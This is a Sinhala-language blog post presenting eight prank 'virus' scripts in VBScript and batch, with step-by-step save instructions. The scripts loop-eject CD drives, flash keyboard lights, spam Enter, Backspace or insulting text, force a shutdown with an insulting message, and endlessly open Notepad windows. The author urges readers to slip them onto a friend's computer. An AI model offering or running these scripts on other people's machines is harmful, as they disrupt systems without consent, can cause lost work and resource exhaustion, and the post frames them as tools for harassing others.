හායි.......෴ කොහොමද ඉතින් කට්ටිය ගිය පාර මම ලියපු post එක ඒ කියන්නෙ වයිරස් ගැන ලියපු පොස්‍ට් කට්ටියට මතක ඇතිනේ. අද නම් ගෙනල්ලා තියෙන්නේ වයිරස් ගැන පොස්ට් එකක් ඒ කියන්නේ පොඩි පොඩි වයිරස් ටිකක්.
ටිකක් කිව්වට 8 ක්ම මෙතන තියනවා. මුලින් ටිකක් පොඩි වයිරස් වලින් පටන් ගමු නේද.?
01. CD / DVD Drive එක පිස්සු වට්ටමු.
- මුලින්ම කරන්න තියෙන්නෙ Notepad open කරගන්න එක.
- ඊට පස්සෙ පහළ තියන code එක කොපි කරල ඔයාලගේ txt file එකට paste කරගන්න.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
දැන් ඉතින් වයිරස් කෝඩ් එක ලියල ඉවරයි. මේක ඔයාලට ඕන නමක් ගහල save කරගන්න. හැබැයි ඔයාල මේක save කරන extension එක අනිවාර්යයෙන් .vbs වෙන්න ඕන
උදා - Anything.vbs
දැන් ඉතින් කරන්න තියෙන්නෙ කාටහරි මේ වයිරස් එක දාලා දෙන එක තමයි.
2 Keyboard එක Knight Rider Circuit එකක් කරමු.
- මුලින්ම කරන්න තියෙන්නෙ Notepad open කරගන්න එක.
- ඊට පස්සෙ පහළ තියන code එක කොපි කරල ඔයාලගේ txt file එකට paste කරගන්න.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
මේකත් ඉස්සෙල්ලා විදියම තමයි. save කරන extension එක .vbs කියල save කරගන්න.
උදා - Anything.vbs
03. යාළුවෙක්ව ඇඬෙන්න ගේමක් දෙමු.
- Notepad open කරගන්න.
- පහළ තියන code එක කොපි කරල ඔයාලගේ txt file එකට paste කරගන්න.
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
මේ script එක save කරන්න ඕන විදිය චුට්ටක් වෙනස් . මේක save කරගන්න ඕන .bat කියන extension එකෙන්.
උදා - Anything.bat
04. Enter button එක දිගට press කරමු.
- Notepad open කරගන්න.
- පහළ තියන code එක කොපි කරල ඔයාලගේ txt file එකට paste කරගන්න.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
මේ script එක නම් මුල් විදියටම තමයි save කරගන්න ඕන.
උදා - Anything.vbs
05. එක පාරටම Notepad එක open වෙලා අපිට ඕන text එකක් auto type කරමු.
- Notepad open කරගන්න.
- පහළ තියන code එක කොපි කරල ඔයාලගේ txt file එකට paste කරගන්න.
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ",I am "
WScript.Sleep 500
WshShell.SendKeys "A"
WScript.Sleep 500
WshShell.SendKeys "m "
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "y "
WScript.Sleep 500
WshShell.SendKeys "u"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys "u"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
මේකත් save කරගන්න තියෙන්නෙත් .vbs කියන extension එකෙන්ම තමයි.
උදා - Anything.vbs
06. Backspace button එක දිගට press කරමු.
- Notepad open කරගන්න.
- පහළ තියන code එක කොපි කරල ඔයාලගේ txt file එකට paste කරගන්න.
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
මේකත් save කරගන්න තියෙන්නෙත් .vbs කියන extension එකෙන්ම තමයි.
උදා - Anything.vbs
07. යාළුවෙක්ගේ keyboard එක hack කරමු.
- Notepad open කරගන්න.
- පහළ තියන code එක කොපි කරල ඔයාලගේ txt file එකට paste කරගන්න.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
මේකත් save කරගන්න තියෙන්නෙත් .vbs කියන extension එකෙන්ම තමයි.
උදා - Anything.vbs
08. දිගට හරහට notepad Open කරමු.
- Notepad open කරගන්න.
- පහළ තියන code එක කොපි කරල ඔයාලගේ txt file එකට paste කරගන්න.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
මේක save කරගන්න ඕන .bat කියන extension එකෙන්.
උදා - Anything.bat
ඔයාලගේ computer එකේ ඔයාල මේක test කරල බලනවනම් risk එකක් අරගෙන කරන්න. ( මම මේ Script ටික ටෙස්ට් කරන්න ගිහිල්ලා පොඩ්ඩක් කෙලවුණා. )
ඔයාලට මේ වයිරස් එක Run වෙන එක නවත්තන්න ඕන නම් Taskmanager වල Run වෙනවා පෙන්නනව ඇති wscript.exe කියල process එකක්. ඒ process එක උඩ Right Click කරල End Process කරන්න.
අද පොස්ට් එක කට්ටියට ගොඩාක් වැදගත් වුණා කියල හිතනවා.
ඔයාලගේ අදහස් තව මොනවාහරි ප්‍රශ්නයක් තියනවා නම් comment එකක් දාලා අපේ Facebook page එකට like එකක් දාලාම යන්න හොඳේ.
෴ ජය වේවා ෴
Post a Comment